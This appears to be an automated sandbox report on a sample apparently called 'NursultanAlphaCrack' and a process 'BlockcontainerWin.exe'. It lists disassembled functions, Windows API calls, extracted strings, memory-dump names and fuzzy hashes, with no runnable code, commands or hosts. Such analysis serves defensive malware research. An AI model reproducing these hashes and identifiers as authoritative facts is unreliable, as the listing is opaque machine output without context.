Part of subcall function 001CF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001CF2E4
Part of subcall function 001CF2C5: GetProcAddress.KERNEL32(002081C8,CryptUnprotectMemory), ref: 001CF2F4

GetCurrentProcessId.KERNEL32(?,?,?,001CF33E), ref: 001CF3D2

Strings

CryptUnprotectMemory failed, xrefs: 001CF3CA
CryptProtectMemory failed, xrefs: 001CF389

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 0c7669f2219023fff5eadbcef6234aff1c30e94dad4fdfcc9a66134bb858c546
Instruction ID: 844afd1f40c72b8f885c6210b1574c36cc4d13ba2d03f6eb13be0a2b9477aff1
Opcode Fuzzy Hash: 0c7669f2219023fff5eadbcef6234aff1c30e94dad4fdfcc9a66134bb858c546
Instruction Fuzzy Hash: E011E131600769BBDB159B20D845F7E3B56FF24B20B04416EFC955B292DB30DE42C695

Function 001CB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001CB9B8

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

Strings

%c:\, xrefs: 001CB9AE

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 4d7d5a2b424d9f4ce729193218ecbb9be8eb7570082fb1cae0e009ff3e17ef7a
Instruction ID: ce9ccbee3e8ed7bd3cfb59ee4d97bd09ffa5ddcbf133a5da6ef90396cb18fb29
Opcode Fuzzy Hash: 4d7d5a2b424d9f4ce729193218ecbb9be8eb7570082fb1cae0e009ff3e17ef7a
Instruction Fuzzy Hash: 3801F963508752A5DA346B768CC7E6FB79CEEB17B0F40440EF594D7082EB30D45082B1

Function 001D101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,001D1160,?,00000000,00000000), ref: 001D1043
SetThreadPriority.KERNEL32(?,00000000), ref: 001D108A

Part of subcall function 001C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C6C54

Strings

CreateThread failed, xrefs: 001D104F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 96e8b72d334db39f78f86fec1a0d64c9530e397058280d46f0bccfc736d41335
Instruction ID: 4cfec1eadc514d764ff58ff648100b1f69d4fe10a8d0143080631afb0a30cc63
Opcode Fuzzy Hash: 96e8b72d334db39f78f86fec1a0d64c9530e397058280d46f0bccfc736d41335
Instruction Fuzzy Hash: 9F01D6B53443097BD3306E64AC51FB6B399EB61751F20002FFA86522C5CFA1A8948624

Function 001C1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 001CE2E8: _swprintf.LIBCMT ref: 001CE30E
Part of subcall function 001CE2E8: _strlen.LIBCMT ref: 001CE32F
Part of subcall function 001CE2E8: SetDlgItemTextW.USER32(?,001FE274,?), ref: 001CE38F
Part of subcall function 001CE2E8: GetWindowRect.USER32(?,?), ref: 001CE3C9
Part of subcall function 001CE2E8: GetClientRect.USER32(?,?), ref: 001CE3D5

GetDlgItem.USER32(00000000,00003021), ref: 001C135A
SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

Strings

0, xrefs: 001C1319

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: e25de15c0ce7ff4f9b2ebb3bff940f11f82261ff921fa6ce1a51c477ca431b39
Instruction ID: 8d55673a50e94618261a1f39d6fe75077b8eed3b5cc6c51b03491463789e472b
Opcode Fuzzy Hash: e25de15c0ce7ff4f9b2ebb3bff940f11f82261ff921fa6ce1a51c477ca431b39
Instruction Fuzzy Hash: D3F081301843C8B6EF154F60980DFA93B99BB6135CF045119FC88515A2CB78C9A1DA60

Function 001E8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 001EBF30: GetEnvironmentStringsW.KERNEL32 ref: 001EBF39
Part of subcall function 001EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EBF5C
Part of subcall function 001EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001EBF82
Part of subcall function 001EBF30: _free.LIBCMT ref: 001EBF95
Part of subcall function 001EBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001EBFA4

_free.LIBCMT ref: 001E82AE
_free.LIBCMT ref: 001E82B5

Strings

0"", xrefs: 001E829B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0""
API String ID: 400815659-2851617606
Opcode ID: 05f89ab1f82bebde03fac7e5625a4b7f39d1a40b4f9510e021d0576fa9316774
Instruction ID: 80b55a6153a4d7ced137aea94dc1ebc2be174246f86ae77513168d3d7174123d
Opcode Fuzzy Hash: 05f89ab1f82bebde03fac7e5625a4b7f39d1a40b4f9510e021d0576fa9316774
Instruction Fuzzy Hash: 5BE0ED23A1ADD3A1A36932BB3C4262F06004BA1338B190326FA288B0C3CF51880684A2

Function 001D0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,001D1206,?), ref: 001D0FEA
GetLastError.KERNEL32(?), ref: 001D0FF6

Part of subcall function 001C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 001D0FFF

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d9d97cc1b8e9da9bafb96f4fccbc318b0f60ec4b96565ca012065bec481f6f0f
Instruction ID: 5f3e32f69a13f1b117a98b01b3252abdca7bcaab3dbd631ef7083727aed9ac27
Opcode Fuzzy Hash: d9d97cc1b8e9da9bafb96f4fccbc318b0f60ec4b96565ca012065bec481f6f0f
Instruction Fuzzy Hash: F1D02B7150413037C71033246C05DBF38049B32731B100719F138502E6CF104AD18295

Function 001CE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,001CDA55,?), ref: 001CE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,001CDA55,?), ref: 001CE2B1

Strings

RTL, xrefs: 001CE2AB

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 66aa6510a18e24dea08829b7f11e9995561b2a2ecaf8aa5a06d51c006544fb69
Instruction ID: cc1303cb179ed190785011409da4bd3536694b86426985b1cc06a6c2cd03fa6e
Opcode Fuzzy Hash: 66aa6510a18e24dea08829b7f11e9995561b2a2ecaf8aa5a06d51c006544fb69
Instruction Fuzzy Hash: E1C08C3124071066EB30A7757C0EFA36E985B10B51F09044EB292EAAD1DFE5C9C0CBE0

Analysis Process: BlockcontainerWin.exePID: 7932, Parent PID: 7880COMMON

Executed Functions

Function 00007FF887D70D78 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D70ED7
"9B, xrefs: 00007FF887D70E01
b4B, xrefs: 00007FF887D70F47
r6B, xrefs: 00007FF887D70EF5

Memory Dump Source

Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: "9B$b4B$r6B$r6B
API String ID: 0-1939837083
Opcode ID: 1f9f0c1f95465a2d1c0f7a76db5f3f6c1d704af46f9af3f13a734585a74b238a
Instruction ID: 4b0f699821e6f2e63deaa8ba424405f5c043f7fc2568ac0e4a5357ba6650dba2
Opcode Fuzzy Hash: 1f9f0c1f95465a2d1c0f7a76db5f3f6c1d704af46f9af3f13a734585a74b238a
Instruction Fuzzy Hash: 9471D071D18A8D8FE785DB68D8293A97FF1FBA6344F4002AAD04AE72D6CF781811C701

Function 00007FF88815F062 Relevance: 4.1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88815F113
r6B, xrefs: 00007FF88815F0C3
r6B, xrefs: 00007FF88815F3C2

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: 123a5e4d9a837840b9869c7b3ff0496dbdde06b44d10f4ab061c5858bb2bdf0e
Instruction ID: f3b7c3e7f3ea875a1bef26874d1297af6f93f713e4c3190e236a511484b898f6
Opcode Fuzzy Hash: 123a5e4d9a837840b9869c7b3ff0496dbdde06b44d10f4ab061c5858bb2bdf0e
Instruction Fuzzy Hash: D1C1E434A18A468FE789DB28C0916B4BBE1FF48340F54467DC44EC7A86DF28F891CB85

Function 00007FF8881572A2 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888157303
r6B, xrefs: 00007FF888157353
r6B, xrefs: 00007FF888157602

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: e9462415e1139966e9ffb52240e395c2cbfbfac840b5cdb548d0708315c4efc9
Instruction ID: b4e91aaa01e4d2681927932f9d57d49c4e262183e4d1d4869eea707996fd517e
Opcode Fuzzy Hash: e9462415e1139966e9ffb52240e395c2cbfbfac840b5cdb548d0708315c4efc9
Instruction Fuzzy Hash: A5C1D134A18A468FE749DB28C0916A4BBE1FF49350F5445BAC44EC7E86DF28B851CB85

Function 00007FF888155700 Relevance: 3.2, Strings: 2, Instructions: 696COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF88815585A
p]L, xrefs: 00007FF888155968

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: 0#L$p]L
API String ID: 0-4069893409
Opcode ID: e0cee1978afe9fc4f9450477fe6272f123eabe2844baf54862fb32fabd909f43
Instruction ID: 80413ec457c3bdd714020563db9250df15b272f0ebf7c4ebaf051b4cee798b92
Opcode Fuzzy Hash: e0cee1978afe9fc4f9450477fe6272f123eabe2844baf54862fb32fabd909f43
Instruction Fuzzy Hash: 72328334A18A1D8FDB98DB18C899AB877E2FF54354F5441B9D00EC7292DF28EC46CB85

Function 00007FF8881520F9 Relevance: 3.1, Strings: 2, Instructions: 563COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF8881524BA
d, xrefs: 00007FF8881523E7

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: b4B$d
API String ID: 0-1886680559
Opcode ID: 93457317831c2847aa73b2f4013a9f684360567decbfd0b31b2ab18b8ca82f19
Instruction ID: eae4f0664d08427bc95117cf4c2a0f11e454b310fdf2878cd32fd633606e521f
Opcode Fuzzy Hash: 93457317831c2847aa73b2f4013a9f684360567decbfd0b31b2ab18b8ca82f19
Instruction Fuzzy Hash: 28020F32A08A468FE798DB28D8856B677E1FF95340F1445B9D49AC7287DE28F843C781

Function 00007FF88815F548 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF88815F5B2
r6B, xrefs: 00007FF88815F567

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: $r6B
API String ID: 0-2315467569
Opcode ID: cbb64657cc49e5cf473615acf463a2df641e06dcaaf0db6c6f8d09ff3e346808
Instruction ID: 8d1abfa8c936564e8eff0a77a43228dc2042e4dc7fe01dc4ae2945343c07463c
Opcode Fuzzy Hash: cbb64657cc49e5cf473615acf463a2df641e06dcaaf0db6c6f8d09ff3e346808
Instruction Fuzzy Hash: A3513775E2850A8FDB58DFA8D4546BDBBB1FF48340F1041BAC01AE7296DF386901CB45

Function 00007FF888157778 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8881577F2
r6B, xrefs: 00007FF8881577A7

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: $r6B
API String ID: 0-2315467569
Opcode ID: e47357fee80cdec012edd1020143b369bb68d5f5526f5f82291cfeda4961a758
Instruction ID: 941e974c5cf37c5f8ac02a483baa1ad463831dc9559fbe754eacf64055c4259f
Opcode Fuzzy Hash: e47357fee80cdec012edd1020143b369bb68d5f5526f5f82291cfeda4961a758
Instruction Fuzzy Hash: 1E514974D0864A8FEB49DBA8D4556BDBBB1FF48340F1048BAC01AE7686DF386806CB54

Function 00007FF88815DF7D Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88815DF8B
r6B, xrefs: 00007FF88815DFC9

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 437c453ef4b6f526a1acb047828db2e9a45843ffdb88682968db3576f66b6e34
Instruction ID: 3786efab296223a09708c1f718e2f1e8b5a174d4b814e7c536ab68c766889e9c
Opcode Fuzzy Hash: 437c453ef4b6f526a1acb047828db2e9a45843ffdb88682968db3576f66b6e34
Instruction Fuzzy Hash: 2A312E35F0891A9FDB58EA5CE4919BCB7E2FF54360B50817AD01ED3682DF24B812CB84

Function 00007FF88815628A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF8881562B5
r6B, xrefs: 00007FF88815628B

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 001a04f55bd56e8bf70666894dd9f57e33b9e133bb431ab6cc93ef1d96e2c431
Instruction ID: 93359f5e913c229fb88e1083708f919ce3906734238595ce60342e750ce74d6c
Opcode Fuzzy Hash: 001a04f55bd56e8bf70666894dd9f57e33b9e133bb431ab6cc93ef1d96e2c431
Instruction Fuzzy Hash: E731E535D0C9464FE799E66898522B8BBE1FF95390F44017AC05EC72C2EF287846C3C5

Function 00007FF88815F7A5 Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF88815FC42

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: b4B
API String ID: 0-3849415641
Opcode ID: 0cc92c6f3ffab50375b8364896b2eb9a3890295b1781b613b234250c9eb750e5
Instruction ID: d60d9c08b3b17116cc61f4acf79e85b794be783caa09f93ece0b4454e94daab1
Opcode Fuzzy Hash: 0cc92c6f3ffab50375b8364896b2eb9a3890295b1781b613b234250c9eb750e5
Instruction Fuzzy Hash: C2F19134928656CFEB59CF18C4E06B53BA1FF45350F5446BDC84ACB68ADB38E881CB45

Function 00007FF88815211A Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF8881523E7

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
Instruction ID: fe326255ca4e15f31ae3a869f0625660fecf35f38ca770afafd2fd142e5d5f3d
Opcode Fuzzy Hash: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
Instruction Fuzzy Hash: C0919C31A18A098BDB9CDE08D485A3677E1FF98340F2445BDD84AC729ADE35F843CB85

Function 00007FF88815D29B Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF88815D2B6

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: 649ffc4cc70353d25a3f82034f5277a543734547cfbf498f36922cc94f8f6920
Instruction ID: 468b58d6cc0019188c5a211052fc0e7d87dc0bd49d4e48d5abf73a7e15f8a5c9
Opcode Fuzzy Hash: 649ffc4cc70353d25a3f82034f5277a543734547cfbf498f36922cc94f8f6920
Instruction Fuzzy Hash: 5A716D74D1C64A8EEB94DBA8C8556BCBBB1FF49380F5404BAD00ED7182DF286882C745

Function 00007FF8881554EB Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

/B, xrefs: 00007FF888155506

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: /B
API String ID: 0-1225004542
Opcode ID: d30374321739827ada92add5ac7d2cf9f7d7a122c8298923280ce3048866cb06
Instruction ID: 2c7ff01f2440614c0105bf7ff13fb7e8fc01c948097e48b47e9413899912fbe4
Opcode Fuzzy Hash: d30374321739827ada92add5ac7d2cf9f7d7a122c8298923280ce3048866cb06
Instruction Fuzzy Hash: C6718E34D2CA8A8EEB95DBA894546FCBFB1FF45390F5000BAD00ED7192EF286841C745

Function 00007FF88816139D Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF8881736C2

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: b4B
API String ID: 0-3849415641
Opcode ID: 710994505a3dc3adb52c3d4e7b260ce64587bcbf5727d6cc1adf279432b03dbb
Instruction ID: 02e99eb54397621d097b67defc18e2ced3bfb5e0ec200b2c578439fa8c57487d
Opcode Fuzzy Hash: 710994505a3dc3adb52c3d4e7b260ce64587bcbf5727d6cc1adf279432b03dbb
Instruction Fuzzy Hash: 7D414924D1C55B8FE765A728D4103F8BBA1FF54340F9481BED08ECB18ADE2C6A85C785

Function 00007FF888157D80 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

b4B, xrefs: 00007FF888157E82

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: b4B
API String ID: 0-3849415641
Opcode ID: 7e12a0b821c25d87809eb149ae9ebb9705e4da51b76cd74c586f61d868b33226
Instruction ID: 1ba694254d125b30378d6362a50ab2618792bda35914a5308547a8d8693afb97
Opcode Fuzzy Hash: 7e12a0b821c25d87809eb149ae9ebb9705e4da51b76cd74c586f61d868b33226
Instruction Fuzzy Hash: D0316C30D1CA6A8EF768D6148462AF87BA1FF54350F1449BAC04EC75C6DE2CBE81CB81

Function 00007FF88815E053 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF88815E065

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: c01ea4f423395cf83686a33a97ae393c57e57d624dc01cab18de1efd37ec5880
Instruction ID: 13f9cb3aed3737ce0f31615b428f7e9217ba94a9ac31765c75e376afe246985a
Opcode Fuzzy Hash: c01ea4f423395cf83686a33a97ae393c57e57d624dc01cab18de1efd37ec5880
Instruction Fuzzy Hash: D621B435F0C58A4FE758AB6898522B87FE1FF453A0F0401BAD05EC75C2DF186846C355

Function 00007FF888156225 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888156219

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 21bc6daebeb56a6177571e4cc8c4bc2310c84fa8fbb0fbd8b1bee908bb7b518e
Instruction ID: 5db5ec22b099f4be116214044ae006ee038dfbbc53d98bda56ccac0635a8af92
Opcode Fuzzy Hash: 21bc6daebeb56a6177571e4cc8c4bc2310c84fa8fbb0fbd8b1bee908bb7b518e
Instruction Fuzzy Hash: CE213D35E0890A9FDB58EA58D4A19BCB7E2FF89350F108279D01ED3282DF24BC52C785

Function 00007FF888155179 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888155193

Memory Dump Source

Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd

Similarity

API ID:
String ID: r6B
